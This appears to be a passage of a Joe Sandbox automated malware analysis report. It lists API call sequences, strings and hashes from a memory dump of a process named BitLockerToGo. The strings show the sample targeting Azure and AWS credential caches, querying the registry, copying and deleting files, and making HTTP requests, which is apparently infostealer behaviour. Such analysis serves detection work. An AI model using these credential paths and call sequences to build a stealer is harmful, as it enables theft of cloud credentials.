                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                • API String ID: 4017274736-974132213
                                                                                                                                                                • Opcode ID: a3f43cb3807ac7276883f2e1416a3a642339a88a318fd0162c9d4cfffd481cd7
                                                                                                                                                                • Instruction ID: 97859f4711bff82d97acf6eb8de3278984d89fa5de5f79c5bcee75cd5e775894
                                                                                                                                                                • Opcode Fuzzy Hash: a3f43cb3807ac7276883f2e1416a3a642339a88a318fd0162c9d4cfffd481cd7
                                                                                                                                                                • Instruction Fuzzy Hash: 9D41D77DA42314ABD714F7B0EC8AFDD3738AB54700F404494B6496E0C5EEF497998B92
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                  • Part of subcall function 030047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 030047EA
                                                                                                                                                                  • Part of subcall function 030047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03004801
                                                                                                                                                                  • Part of subcall function 030047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03004818
                                                                                                                                                                  • Part of subcall function 030047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 03004839
                                                                                                                                                                  • Part of subcall function 030047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 03004849
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 03004915
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,03554CA0), ref: 0300493A
                                                                                                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 03004ABA
                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,03020DDB,00000000,?,?,00000000,?,",00000000,?,03554DD0), ref: 03004DE8
                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 03004E04
                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 03004E18
                                                                                                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 03004E49
                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 03004EAD
                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 03004EC5
                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,03554DB0,?,03556390,00000000,00000000,00400100,00000000), ref: 03004B15
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 03004ECF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                                                • String ID: "$"$------$------$------
                                                                                                                                                                • API String ID: 2402878923-2180234286
                                                                                                                                                                • Opcode ID: 7b81a2847e2ba8c142625cb2c26defd3d6c4312ccd9664d17fe6f6af4a98c226
                                                                                                                                                                • Instruction ID: a129d6c2946f235587a7adf0385b496033d42fa196044e306c69e6f636146acd
                                                                                                                                                                • Opcode Fuzzy Hash: 7b81a2847e2ba8c142625cb2c26defd3d6c4312ccd9664d17fe6f6af4a98c226
                                                                                                                                                                • Instruction Fuzzy Hash: 4E122176A13218ABDB15EB90DD91FEEB378BF94210F504199A1067B090EF706F5ACF60
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(00000000,035533D0,00000000,00020019,00000000,030205B6), ref: 030183A4
                                                                                                                                                                • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 03018426
                                                                                                                                                                • wsprintfA.USER32 ref: 03018459
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0301847B
                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0301848C
                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 03018499
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                                                                                                • String ID: - $%s\%s$?
                                                                                                                                                                • API String ID: 3246050789-3278919252
                                                                                                                                                                • Opcode ID: 2a08078269c94bfcf3d6cea6767f4bce768cda416974f5eb5f2a568c4e522cd7
                                                                                                                                                                • Instruction ID: 5a60551030d21f3e5abb70d81e41107d10900eafa3caff6d0fcf847f66569c57
                                                                                                                                                                • Opcode Fuzzy Hash: 2a08078269c94bfcf3d6cea6767f4bce768cda416974f5eb5f2a568c4e522cd7
                                                                                                                                                                • Instruction Fuzzy Hash: 84810B759522189BEB24EB50DD94FEEB7B8FB48710F00C699E109A6140DF716B85CFA0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                  • Part of subcall function 030047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 030047EA
                                                                                                                                                                  • Part of subcall function 030047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03004801
                                                                                                                                                                  • Part of subcall function 030047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03004818
                                                                                                                                                                  • Part of subcall function 030047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 03004839
                                                                                                                                                                  • Part of subcall function 030047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 03004849
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                • InternetOpenA.WININET(03020DFE,00000001,00000000,00000000,00000000), ref: 030062E1
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,03554CA0), ref: 03006303
                                                                                                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 03006335
                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,GET,?,03556390,00000000,00000000,00400100,00000000), ref: 03006385
                                                                                                                                                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 030063BF
                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 030063D1
                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 030063FD
                                                                                                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0300646D
                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 030064EF
                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 030064F9
                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 03006503
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                                                                                • String ID: ERROR$ERROR$GET
                                                                                                                                                                • API String ID: 3074848878-2509457195
                                                                                                                                                                • Opcode ID: 9b29e739940def0c11258315aa6f44cbd95f8833da350ecb980a2c5c1b53a60a
                                                                                                                                                                • Instruction ID: cc5a9190e6c4ac4539052ece69fc4329236e1c61bbd9224c0a2cd4250553a100
                                                                                                                                                                • Opcode Fuzzy Hash: 9b29e739940def0c11258315aa6f44cbd95f8833da350ecb980a2c5c1b53a60a
                                                                                                                                                                • Instruction Fuzzy Hash: 8A715375A42318ABEB14EFA0DC48BDE77B5FB44700F108198F5056B5C4DBB56A85CF50
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A820: lstrlen.KERNEL32(00000000,?,?,03015B54,03020ADB,03020ADA,?,?,03016B16,00000000,?,03540578,?,0302110C,?,00000000), ref: 0301A82B
                                                                                                                                                                  • Part of subcall function 0301A820: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A885
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 03015644
                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 030156A1
                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 03015857
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                  • Part of subcall function 030151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 03015228
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                  • Part of subcall function 030152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 03015318
                                                                                                                                                                  • Part of subcall function 030152C0: lstrlen.KERNEL32(00000000), ref: 0301532F
                                                                                                                                                                  • Part of subcall function 030152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 03015364
                                                                                                                                                                  • Part of subcall function 030152C0: lstrlen.KERNEL32(00000000), ref: 03015383
                                                                                                                                                                  • Part of subcall function 030152C0: strtok.MSVCRT(00000000,?), ref: 0301539E
                                                                                                                                                                  • Part of subcall function 030152C0: lstrlen.KERNEL32(00000000), ref: 030153AE
                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0301578B
                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 03015940
                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 03015A0C
                                                                                                                                                                • Sleep.KERNEL32(0000EA60), ref: 03015A1B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpylstrlen$Sleepstrtok
                                                                                                                                                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                • API String ID: 3630751533-2791005934
                                                                                                                                                                • Opcode ID: 9d3b88a1461a19245d3a930de1cc257f72a750c2baae0d0883779994820c2a57
                                                                                                                                                                • Instruction ID: 68b3dd73b6459f043fc1199aa05c04d0e1dcb4dd312b16f840c4056c50374217
                                                                                                                                                                • Opcode Fuzzy Hash: 9d3b88a1461a19245d3a930de1cc257f72a750c2baae0d0883779994820c2a57
                                                                                                                                                                • Instruction Fuzzy Hash: 92E1547AA132049BDB18FBA0ED55EED737CAFD4210F408529A4065F184EF746B2ECB91
                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 03001327
                                                                                                                                                                  • Part of subcall function 030012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 030012B4
                                                                                                                                                                  • Part of subcall function 030012A0: RtlAllocateHeap.NTDLL(00000000), ref: 030012BB
                                                                                                                                                                  • Part of subcall function 030012A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 030012D7
                                                                                                                                                                  • Part of subcall function 030012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 030012F5
                                                                                                                                                                  • Part of subcall function 030012A0: RegCloseKey.ADVAPI32(?), ref: 030012FF
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0300134F
                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 0300135C
                                                                                                                                                                • lstrcat.KERNEL32(?,.keys), ref: 03001377
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                  • Part of subcall function 03018B60: GetSystemTime.KERNEL32(?,03549910,030205AE,?,?,?,?,?,?,?,?,?,03004963,?,00000014), ref: 03018B86
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 03001465
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                  • Part of subcall function 030099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 030099EC
                                                                                                                                                                  • Part of subcall function 030099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 03009A11
                                                                                                                                                                  • Part of subcall function 030099C0: LocalAlloc.KERNEL32(00000040,?), ref: 03009A31
                                                                                                                                                                  • Part of subcall function 030099C0: ReadFile.KERNEL32(000000FF,?,00000000,030102E7,00000000), ref: 03009A5A
                                                                                                                                                                  • Part of subcall function 030099C0: LocalFree.KERNEL32(030102E7), ref: 03009A90
                                                                                                                                                                  • Part of subcall function 030099C0: CloseHandle.KERNEL32(000000FF), ref: 03009A9A
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 030014EF
                                                                                                                                                                • memset.MSVCRT ref: 03001516
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
